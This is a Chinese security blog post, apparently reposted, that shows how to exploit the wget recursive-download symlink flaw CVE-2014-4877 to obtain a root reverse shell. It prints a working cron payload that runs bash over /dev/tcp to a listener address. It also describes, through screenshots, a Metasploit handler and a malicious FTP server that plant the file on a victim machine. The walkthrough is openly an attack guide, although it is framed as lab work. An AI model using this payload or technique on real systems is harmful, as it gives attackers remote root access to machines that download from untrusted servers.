记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

利用wget漏洞(CVE-2014-4877)反弹shell

2014-11-03 17:37

28日,linux操作系统的wget被发现安全漏洞,当用户通过wget命令递归下载文件时,攻击者可通过构造恶意的符号链接文件触发该漏洞,从而在wget用户的系统中创建任意文件、目录或符号链接并设置访问权限。

攻防实验室的小伙伴们在当天就对漏洞进行了分析验证。不久后国外的安全研究者已经能通过此漏洞反弹交互式的shell,利用的是linux的计划任务。Metasploit也更新了相应的模块,下面我们一起来看看怎么利用wget漏洞获得交互式的shell吧。

首先我们先建立一个计划任务文件,文件内容是反弹一个交互式的shell到本机。

cat>cronshell <<EOD
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '<&112-;exec 112<>/dev/tcp/ 192.168.220.128/4444;sh <&112 >&112 2>&112'                             
EOD


然后,我们利用msf监听本地端口。

http://p6.qhimg.com/t0106ed11bf71a0b005.png

搭建一个攻击ftp

http://p6.qhimg.com/t01a0e61f369c19fcef.png

下面我用一台centos递归下载ftp上的内容。

http://p0.qhimg.com/t016f920547f636f71d.png

可以看到,我们已经获得了session。

http://p3.qhimg.com/t01aa462e23f9f8cf22.png

小编感觉通过添加计划任务获得shell的方法真的很强(wei)大(suo),你有没有更好的利用方法呢?欢迎发邮件给我们。



知识来源: bobao.360.cn/learning/detail/72.html

阅读:293823 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“利用wget漏洞(CVE-2014-4877)反弹shell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云